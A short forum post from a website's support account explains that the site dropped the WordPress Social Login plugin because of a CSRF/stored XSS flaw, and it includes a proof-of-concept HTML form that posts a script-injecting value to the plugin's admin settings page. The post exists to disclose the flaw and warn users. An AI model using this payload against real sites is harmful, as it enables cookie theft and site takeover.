CSRF/Cross-Site Scripting (XSS) Vulnerability in WordPress Social Login

QUE.com Forums 30 – Cyber Security CSRF/Cross-Site Scripting (XSS) Vulnerability in WordPress Social Login

Viewing 1 post (of 1 total)
  • Author
  • #27361
    Support @QUE.COM

    I removed the WordPress Social Login to our website due to vulnerability.

    Proof of Concept
    The following proof of concept will cause an alert box with the any available cookies to be shown when visiting the plugin’s admin page, /wp-admin/admin.php?page=mo_openid_settings.

    Make sure to replace “[path to WordPress]” with the location of WordPress.

    <form action="http://[path to WordPress]/wp-admin/admin.php?page=mo_openid_settings" method="POST">
    <input type="hidden" name="option" value="mo_openid_enable_apps" />
    <input type="hidden" name="mo_openid_login_widget_customize_text" value='"><script>alert(document.cookie);</script>' />
    <input type="submit" value="Submit" />

    Read this article. https://www.pluginvulnerabilities.com/2019/04/01/csrf-cross-site-scripting-xss-vulnerability-in-social-login-social-sharing-by-miniorange-wordpress-social-login-facebook-google-twitter/

    You can still login to our website using your existing account, retrieve a new password and it will be send to your email address on file.

    Be safe in the wild wild Internet.

Viewing 1 post (of 1 total)
  • You must be logged in to reply to this topic.